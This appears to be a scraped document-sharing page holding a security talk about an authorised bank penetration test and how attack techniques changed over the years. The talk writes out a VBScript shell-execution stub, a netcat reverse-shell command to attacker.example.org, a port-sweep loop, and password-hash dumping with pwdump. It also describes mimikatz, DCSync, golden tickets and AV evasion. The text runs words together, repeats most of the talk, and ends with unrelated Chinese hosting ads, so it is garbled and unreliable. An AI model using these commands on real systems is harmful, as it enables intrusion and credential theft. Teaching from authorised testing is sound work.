Supportedpw
pw 时间:2021-02-19 阅读:()
PWNINGBANKSHOWTHEPLAYGROUNDEVOLVEDOVERTHEYEARSByMiikaTurkiaAUTHORMiikaTurkia0751155C83EB3327299EE49D66D0DFA2705BE5DCleadsecurityspecialist@nixuPentestersince'99PAST-PRESENT-FUTUREDISCLAIMER/CONFIDENTIALITYInprinciple,alltheassignmentsarehighlycondentialandcannotbediscussedinpublic(orinprivate)EvenincustomerorganizationonlyafewpeopleknowaboutthetestsorseethereportLuckilyIhaveoneassignmentfromyearsagothatIcandiscusstosomeextentENGAGEMENTAbankwantedpenetrationtestagainsttheirwholeenvironmentInitialtimeallocationwas2weeksThecustomerapparentlywantedtousethereportformarketingpurposesorconvincingtheircustomersAssignmentwasdeemed"completed"afterreportinginitialndingsRULEZTestingoccurredovertheInternetasblackboxtestingNouseraccountsNodocumentationNospeciallimitations,exceptnodisruptiontoservicesNomonetarytransactionsallowedTargetconsistedofaCclassnetworkNETWORKARCHITECTUREFollowingistheassumednetworkarchitecture{Internet}{Internalnetwork}---|FW|||/^^^^^\{DMZ}\__^__/RECONNAISSANCEShoot'emwithallIgotNoneedtostayundertheradarPortscanningQuickscantogetfastresultsThoroughscanonthebackgroundVulnerabilityscanningaftertheinitialportscanINITIALRESULTSThetargetlookedquitechallenging1HTTPSportopenEverythingseemstobeup-to-dateNohighormediumlevelvulnerabilitiesidentiedbyNessusWebapplicationprovidesbasicallyonlyaloginpageNovulnerabilitiesorindicationsofsuchidentiedininitialprobingMOSTPROMISINGNESSUSFINDINGGAININGCODEEXECUTIONLearningtouseMicroSoftFrontPageLearningtowritesomethingusableinVisualBasicScriptMakesuretheVBSisrunonserversideDimshellSetshell=WScript.
CreateObject("WScript.
Shell")shell.
Run""CHALLENGESWITHUPLOADEDBINARIESAttemptingtogaineasieraccessthanuploadingcustomVBSlesUploadnc.
exebinaryResultedinalewithsize0TrysomeotherbinariestoensureeverythingworksSomelesworkperfectlywhileothersendupwithzerosizeGETTINGSHELLDosometrivialmodicationstonc.
exetobypassAVsignaturechecksSuccessStartlistenerlocallytowaitforshellsessionRunthefollowingnetcatcommandusingtheVBScriptdescribedpreviously#iptables-IINPUT-ptcp--dport443-svictim-jACCEPT#nc-nv-l-p443nc.
exeattacker.
example.
org443-ecmd.
exePWDUMPFAMILYMultipleiterationsofsimilarlynamedtoolstodumptheWindowspasswordhashesTheymostlygrabbedthehashesfromSAMdatabase,decryptingthemwithSYSKEYwhenrequiredSupportedWindowsversionsrangefromWindowsNTtoVistaThesetoolshadtoberunontargetmachinewithAdministratorprivilegesSomeofthevariantssupportedobtainingpasswordsoverthenetworkGRABBINGCREDENTIALSDirectdumpofpasswordhashesfromtheSAMdatabasefailedasrunningwithlimitedprivilegesWindowstakesanautomaticcopyofe.
g.
theSAMdatabaseRunningpwdumpagainstthatsucceededgivingmeauserlistalongwiththeirpasswordhashesLANMANHASHEventhoughWindowswasusingNTLMv2hashes,italsostoredLanManhashesbydefaultUsedhashingalgorithmisextremelyfasttocrackMillionsoftestpersecondevenatthattimeLMhashsupports7+7charactersinpasswordsOnlyuppercaseletters,numbersandspecialcharactersEvenAdministratorpasswordwascrackedinnotimePOKINGAROUNDUnderstandingtheenvironmentiscriticalforfurtherattacksWithshellaccess,IwasabletostudythecompromisedhostanditssurroundingsOnlyaccesswithintheDMZ,InternalnetworkwastotallysealedoffLeveragingotherhostswithinDMZdidnotresultinanymorevisibilityoftheinternalnetwork"OLDSTYLEPIVOTING"UsingnetcattoscanafewcommonTCPportstoseeifIhadaccesselsewhereOntopoftheWindows(andHTTPS)protocols,oneIPofferedtelnetaccess,andturnedouttobeaCiscorouterTrivialwayslikedefaultcredentialsorSNMPleakingcongurationsorevenallowingmodicationsdidn'tyfor/l%iin(1,1,254)do(for%pin(21,22,23,25,135,139)donc-nvz127.
0.
0.
%i%p)2>&1|find"open"NETWORKARCHITECTUREUPDATED{Internet}{Internalnetwork}---|FW||/|\{Backend}{DMZ}{Router}LATERALMOVEMENTExcellenttoolcalledpsexecfromSysinternalsisusedtoruncommandsonremoteWindowshostsSupportspass-the-hashandpasswordauthenticationSambalesharestoaccessharddisksNetcatalsopossibleforTCPbasedclear-textservicesINTERNALNETWORKISSOFARAWAYAtthispoint,theDMZwasprettymuchowned,butthegoalwasstillunreachableIreallyneededabreakthroughtogainaccesstotheinternalnetworkGoingthroughthefewavailablehostsanddatawithin,IdiscoveredaterminallogthatseemedinterestingThelogcontainedalltheinputfromtheuserontopofservermessagesAdministrationpasswordfortheInternetrouterCATALYSTAmodularchassisthatcanaccommodatee.
g.
switch,routerandrewallmodulesThechassisranCatOSwhiletheinstalledmodulesranIOSACCESSINGTHEFIREWALLLoggingintotheroutermodulewithtelnetEnableadminfunctionalitywiththeleakedpasswordJumpintoCatOSandfromthereaccessthe"console"ofrewallmoduleCatOSallowsconsoleaccesstoanyinstalledmoduleNormallyadministratorslogdirectlyintotheCatOSinsteadofinstalledmodules,butinthiscasethedirectaccesstoCatOSwasblockedSamepasswordwasusedfortherewall,sonowIhadfullaccesstoitNEWRULETOMASTERTHEMALLAsalltrafcfromtheInternetandDMZtointernalnetworkwasblocked,IhadtochangethegameAddingnewrewallruleforafewchosenTCPportsfrommyIPwasneededWritetherulebutbeextremelycarefultolimitchangestoyourselfonly!
CommitthechangesandgainfastpathtointernalnetworkACCESSINGTHEDOMAINCONTROLLERAquicksweep/enumerationoftheinternalnetworkUseSMBNULLsessiontograbmoreinformationaboutWindowssystemsI.
e.
enumandwinfoRemotedesktopwasenabledontheInternalserverssotryingmyluckwiththecredentialsgrabbedfromDMZEasywinwiththeAdministratoraccountNETWORKARCHITECTUREUPDATEDInternet}|Router{Internalnetwork}---|FW|/\||Windows|+|VMS|+|\DMZ}{Backend}MIDAUDITCHECKPOINTFindingssofarwerecommunicatedtothecustomeronrstweek'sFriday.
(Informationaboutthegapingholeallowingtheinitialcompromisewasgivenimmediatelywhendiscovered.
)IwasplanningtostartpokingaroundtheinternalbankingapplicationsandVMSsystemsonMondayTheassignmentwasdeemedtobecompletedatthispointwhencustomerdigestedthendingssofarPASTVS.
PRESENT-BANKINGSECTORMorebanksareconcernedabouttheirsecurityScopetendstobemorefocused,possiblymissingholesintheadjacentserversorAPIsRedteamingLegislationandprivacyaspectsoftenforceustoignorethesocialengineeringandphishingaspectsofinitialfootholdDependsbetweencountriesTECHNICALMEASURESOTPisnotsolelyreliedonSMSvericationmobileappRiskbasedvalidationsFrauddetectionIsolationofdifferentservicesPVS.
P-OVERALLIngeneralsecurityhasimprovedquitemassivelyindifferentproductsandenvironmentsAfewtoolsremainprettymuchthesamenmapnessusManyoftheattackingtechniquesrelyondesignedfunctionalityandthusdifculttopreventWHYTOCRACKANDWHYNOTCrackingpasswordshasbecomelessnecessaryPass-the-hashPass-the-tokenButPWcrackingisstillusefulFasterthaneverRainbowtablesGPU,multi-core,cloudDetecting/exploitingpasswordreuseRDPandotherprotocolsWINDOWSAPISBasicallyusageofWindowsAPIsisthesameSomenewrestrictionsareputinplaceEvenmoreinterestingavenueshavebeendiscoveredToolsaresomewhatthesamebutbetteroneshavecomealongpsexecstillgoingstrongpwdumphasbeen"replaced"bymimikatzthatdoesthesamebutalsoalotmoreVBScripthasbeenoverrunbyPowerShellEASYORHARD"Hacking"hasbecomealoteasierwithgoodtoolstoautomateandsimplifytasksDefencesandprotectionmechanismsraisethebaralotExperiencesinincidentresponseandforensicsstillshowthesametricksbeingusedconstantlyinpresentdayMoststupidmistakesareexploitedHighlyadvancedattacksarealsobeingusedPVS.
P-DUMPINGPASSWORDHASHESToolsandtechniqueshaveevolvedquiteabitmimikatzGrabscleartextpasswords,hashesandkerberosticketsfrommemoryCanperformpass-the-hash,pass-the-ticket,buildgoldenticket,.
.
.
RuntoolsdirectlyfrommemorytoavoidAVdetectionPENETRATIONTESTINGFRAMEWORKSIntegratealotofreliableexploitsandfunctionalityPrettymuchallofthemsupportgrabbingpasswords(hashesandcleartext)OftenusingmimikatzNotonlycredentialsaregrabbedbutalsousedautomaticallyforlateralmovementGRABBINGTHEHASHESONWINDOWSDOMAINThereareafewwaystograbhasheswhenhavingenoughprivilegesonaWindowsDomainRequiredgroup:Administrators(includingDomainandEnterprise),orDomainControllercomputeraccountDCSyncisthemostnotablemethodcurrentlyAcomputerimpersonatesasadomaincontrollerandasksthevictimDCtoreplicateusercredentialsGOLDENTICKETGeneratearbitraryKerberosTGTticketsforanyuserofthetargetdomainCanbecreatedoff-lineKerberoslifetimepolicydoesnotaffectgoldenticketsCanbeusedwithpass-the-ticketmethodtoaccessanyresourceorimpersonateasanydomainuserPVS.
P-ANTI-VIRUSAntivirussoftwarehasevolvedfrompuresignaturebasedtouseheuristicsSandboxingisusedinanalysisandcontainmentAVcanstillbebypassedSlightmodicationsonbinariesTechniquestoescapesandboxhavebeendescribedovertheyearsLoadingmaliciousPowerShellfromnetworkandexecutingdirectlyinmemoryATT&CKAdversarialTactics,Techniques,andCommonKnowledge(ATT&CK)Goodinformationaboutthetecniquesandexampleswhenusede.
g.
byATPgroupshttps://attack.
mitre.
org/wiki/Main_PagePVS.
P-DETECTIONWindowsloggingstill(mostly)sucksbydefaultNopropervisibilityonwhat'shappeningonservers/workstationsDefaultlogretentionperiodsaretoosmallLogsarenotforwardedtoremotemachineLoganalysis/correlationislackingImportanteventsordetailsarenotloggedPlentyofirrelevantnoisetoclutterupthelogsandshortentheretention"period"(inMB)FUTURE
CreateObject("WScript.
Shell")shell.
Run""CHALLENGESWITHUPLOADEDBINARIESAttemptingtogaineasieraccessthanuploadingcustomVBSlesUploadnc.
exebinaryResultedinalewithsize0TrysomeotherbinariestoensureeverythingworksSomelesworkperfectlywhileothersendupwithzerosizeGETTINGSHELLDosometrivialmodicationstonc.
exetobypassAVsignaturechecksSuccessStartlistenerlocallytowaitforshellsessionRunthefollowingnetcatcommandusingtheVBScriptdescribedpreviously#iptables-IINPUT-ptcp--dport443-svictim-jACCEPT#nc-nv-l-p443nc.
exeattacker.
example.
org443-ecmd.
exePWDUMPFAMILYMultipleiterationsofsimilarlynamedtoolstodumptheWindowspasswordhashesTheymostlygrabbedthehashesfromSAMdatabase,decryptingthemwithSYSKEYwhenrequiredSupportedWindowsversionsrangefromWindowsNTtoVistaThesetoolshadtoberunontargetmachinewithAdministratorprivilegesSomeofthevariantssupportedobtainingpasswordsoverthenetworkGRABBINGCREDENTIALSDirectdumpofpasswordhashesfromtheSAMdatabasefailedasrunningwithlimitedprivilegesWindowstakesanautomaticcopyofe.
g.
theSAMdatabaseRunningpwdumpagainstthatsucceededgivingmeauserlistalongwiththeirpasswordhashesLANMANHASHEventhoughWindowswasusingNTLMv2hashes,italsostoredLanManhashesbydefaultUsedhashingalgorithmisextremelyfasttocrackMillionsoftestpersecondevenatthattimeLMhashsupports7+7charactersinpasswordsOnlyuppercaseletters,numbersandspecialcharactersEvenAdministratorpasswordwascrackedinnotimePOKINGAROUNDUnderstandingtheenvironmentiscriticalforfurtherattacksWithshellaccess,IwasabletostudythecompromisedhostanditssurroundingsOnlyaccesswithintheDMZ,InternalnetworkwastotallysealedoffLeveragingotherhostswithinDMZdidnotresultinanymorevisibilityoftheinternalnetwork"OLDSTYLEPIVOTING"UsingnetcattoscanafewcommonTCPportstoseeifIhadaccesselsewhereOntopoftheWindows(andHTTPS)protocols,oneIPofferedtelnetaccess,andturnedouttobeaCiscorouterTrivialwayslikedefaultcredentialsorSNMPleakingcongurationsorevenallowingmodicationsdidn'tyfor/l%iin(1,1,254)do(for%pin(21,22,23,25,135,139)donc-nvz127.
0.
0.
%i%p)2>&1|find"open"NETWORKARCHITECTUREUPDATED{Internet}{Internalnetwork}---|FW||/|\{Backend}{DMZ}{Router}LATERALMOVEMENTExcellenttoolcalledpsexecfromSysinternalsisusedtoruncommandsonremoteWindowshostsSupportspass-the-hashandpasswordauthenticationSambalesharestoaccessharddisksNetcatalsopossibleforTCPbasedclear-textservicesINTERNALNETWORKISSOFARAWAYAtthispoint,theDMZwasprettymuchowned,butthegoalwasstillunreachableIreallyneededabreakthroughtogainaccesstotheinternalnetworkGoingthroughthefewavailablehostsanddatawithin,IdiscoveredaterminallogthatseemedinterestingThelogcontainedalltheinputfromtheuserontopofservermessagesAdministrationpasswordfortheInternetrouterCATALYSTAmodularchassisthatcanaccommodatee.
g.
switch,routerandrewallmodulesThechassisranCatOSwhiletheinstalledmodulesranIOSACCESSINGTHEFIREWALLLoggingintotheroutermodulewithtelnetEnableadminfunctionalitywiththeleakedpasswordJumpintoCatOSandfromthereaccessthe"console"ofrewallmoduleCatOSallowsconsoleaccesstoanyinstalledmoduleNormallyadministratorslogdirectlyintotheCatOSinsteadofinstalledmodules,butinthiscasethedirectaccesstoCatOSwasblockedSamepasswordwasusedfortherewall,sonowIhadfullaccesstoitNEWRULETOMASTERTHEMALLAsalltrafcfromtheInternetandDMZtointernalnetworkwasblocked,IhadtochangethegameAddingnewrewallruleforafewchosenTCPportsfrommyIPwasneededWritetherulebutbeextremelycarefultolimitchangestoyourselfonly!
CommitthechangesandgainfastpathtointernalnetworkACCESSINGTHEDOMAINCONTROLLERAquicksweep/enumerationoftheinternalnetworkUseSMBNULLsessiontograbmoreinformationaboutWindowssystemsI.
e.
enumandwinfoRemotedesktopwasenabledontheInternalserverssotryingmyluckwiththecredentialsgrabbedfromDMZEasywinwiththeAdministratoraccountNETWORKARCHITECTUREUPDATEDInternet}|Router{Internalnetwork}---|FW|/\||Windows|+|VMS|+|\DMZ}{Backend}MIDAUDITCHECKPOINTFindingssofarwerecommunicatedtothecustomeronrstweek'sFriday.
(Informationaboutthegapingholeallowingtheinitialcompromisewasgivenimmediatelywhendiscovered.
)IwasplanningtostartpokingaroundtheinternalbankingapplicationsandVMSsystemsonMondayTheassignmentwasdeemedtobecompletedatthispointwhencustomerdigestedthendingssofarPASTVS.
PRESENT-BANKINGSECTORMorebanksareconcernedabouttheirsecurityScopetendstobemorefocused,possiblymissingholesintheadjacentserversorAPIsRedteamingLegislationandprivacyaspectsoftenforceustoignorethesocialengineeringandphishingaspectsofinitialfootholdDependsbetweencountriesTECHNICALMEASURESOTPisnotsolelyreliedonSMSvericationmobileappRiskbasedvalidationsFrauddetectionIsolationofdifferentservicesPVS.
P-OVERALLIngeneralsecurityhasimprovedquitemassivelyindifferentproductsandenvironmentsAfewtoolsremainprettymuchthesamenmapnessusManyoftheattackingtechniquesrelyondesignedfunctionalityandthusdifculttopreventWHYTOCRACKANDWHYNOTCrackingpasswordshasbecomelessnecessaryPass-the-hashPass-the-tokenButPWcrackingisstillusefulFasterthaneverRainbowtablesGPU,multi-core,cloudDetecting/exploitingpasswordreuseRDPandotherprotocolsWINDOWSAPISBasicallyusageofWindowsAPIsisthesameSomenewrestrictionsareputinplaceEvenmoreinterestingavenueshavebeendiscoveredToolsaresomewhatthesamebutbetteroneshavecomealongpsexecstillgoingstrongpwdumphasbeen"replaced"bymimikatzthatdoesthesamebutalsoalotmoreVBScripthasbeenoverrunbyPowerShellEASYORHARD"Hacking"hasbecomealoteasierwithgoodtoolstoautomateandsimplifytasksDefencesandprotectionmechanismsraisethebaralotExperiencesinincidentresponseandforensicsstillshowthesametricksbeingusedconstantlyinpresentdayMoststupidmistakesareexploitedHighlyadvancedattacksarealsobeingusedPVS.
P-DUMPINGPASSWORDHASHESToolsandtechniqueshaveevolvedquiteabitmimikatzGrabscleartextpasswords,hashesandkerberosticketsfrommemoryCanperformpass-the-hash,pass-the-ticket,buildgoldenticket,.
.
.
RuntoolsdirectlyfrommemorytoavoidAVdetectionPENETRATIONTESTINGFRAMEWORKSIntegratealotofreliableexploitsandfunctionalityPrettymuchallofthemsupportgrabbingpasswords(hashesandcleartext)OftenusingmimikatzNotonlycredentialsaregrabbedbutalsousedautomaticallyforlateralmovementGRABBINGTHEHASHESONWINDOWSDOMAINThereareafewwaystograbhasheswhenhavingenoughprivilegesonaWindowsDomainRequiredgroup:Administrators(includingDomainandEnterprise),orDomainControllercomputeraccountDCSyncisthemostnotablemethodcurrentlyAcomputerimpersonatesasadomaincontrollerandasksthevictimDCtoreplicateusercredentialsGOLDENTICKETGeneratearbitraryKerberosTGTticketsforanyuserofthetargetdomainCanbecreatedoff-lineKerberoslifetimepolicydoesnotaffectgoldenticketsCanbeusedwithpass-the-ticketmethodtoaccessanyresourceorimpersonateasanydomainuserPVS.
P-ANTI-VIRUSAntivirussoftwarehasevolvedfrompuresignaturebasedtouseheuristicsSandboxingisusedinanalysisandcontainmentAVcanstillbebypassedSlightmodicationsonbinariesTechniquestoescapesandboxhavebeendescribedovertheyearsLoadingmaliciousPowerShellfromnetworkandexecutingdirectlyinmemoryATT&CKAdversarialTactics,Techniques,andCommonKnowledge(ATT&CK)Goodinformationaboutthetecniquesandexampleswhenusede.
g.
byATPgroupshttps://attack.
mitre.
org/wiki/Main_PagePVS.
P-DETECTIONWindowsloggingstill(mostly)sucksbydefaultNopropervisibilityonwhat'shappeningonservers/workstationsDefaultlogretentionperiodsaretoosmallLogsarenotforwardedtoremotemachineLoganalysis/correlationislackingImportanteventsordetailsarenotloggedPlentyofirrelevantnoisetoclutterupthelogsandshortentheretention"period"(inMB)FUTURE
ReliableSite:美国服务器租用,洛杉矶/纽约/迈阿密等机房;E3-1240V6/64GB/1TSSD,$95/月
reliablesite怎么样?reliablesite是一家于2006年成立的老牌美国主机商,主要提供独服,数据中心有迈阿密、纽约、洛杉矶等,均免费提供20Gbps DDoS防护,150TB月流量,1Gbps带宽。月付19美金可升级为10Gbps带宽。洛杉矶/纽约/迈阿密等机房,E3-1240V6/64GB内存/1TB SSD硬盘/DDOS/150TB流量/1Gbps带宽/DDOS,$95/月,...
Webhosting24:$1.48/月起,日本东京NTT直连/AMD Ryzen 高性能VPS/美国洛杉矶5950X平台大流量VPS/1Gbps端口/
Webhosting24宣布自7月1日起开始对日本机房的VPS进行NVMe和流量大升级,几乎是翻倍了硬盘和流量,价格依旧不变。目前来看,日本VPS国内过去走的是NTT直连,服务器托管机房应该是CDN77*(也就是datapacket.com),加上高性能平台(AMD Ryzen 9 3900X+NVMe),还是有相当大的性价比的。此外在6月30日,又新增了洛杉矶机房,CPU为AMD Ryzen 9...
数脉科技香港物理机 E3 16G 10M 华为线路165元 阿里云线路 188元 Cera线路 157元
2021年9月中秋特惠优惠促销来源:数脉科技 编辑:数脉科技编辑部 发布时间:2021-09-11 03:31尊敬的新老客户:9月优惠促销信息如下,10Mbps、 30Mbps、 50Mbps、100Mbps香港优质或BGPN2、阿里云线路、华为云线路,满足多种项目需求!支持测试。全部线路首月五折起。数脉官网 https://my.shuhost.com/香港特价数脉阿里云华为云 10MbpsCN...
pw为你推荐
-
免费开通黄钻花钱开通黄钻和免费开通有什么区别?依赖注入依赖注入是什么意思?不兼容手机软件与系统不兼容应该怎么办安卓应用平台手机系统应用在哪腾讯文章腾讯新闻的精选微信里面收藏的文章在哪里畅想中国淄博畅想中国消费怎么样数据库损坏数据库损坏是怎么回事啊?创维云电视功能什么是创维云电视啊?创维云电视是什么意思?安装迅雷看看播放器迅雷看看不能播放,说我尚未安装迅雷看看播放器宕机宕机是什么意思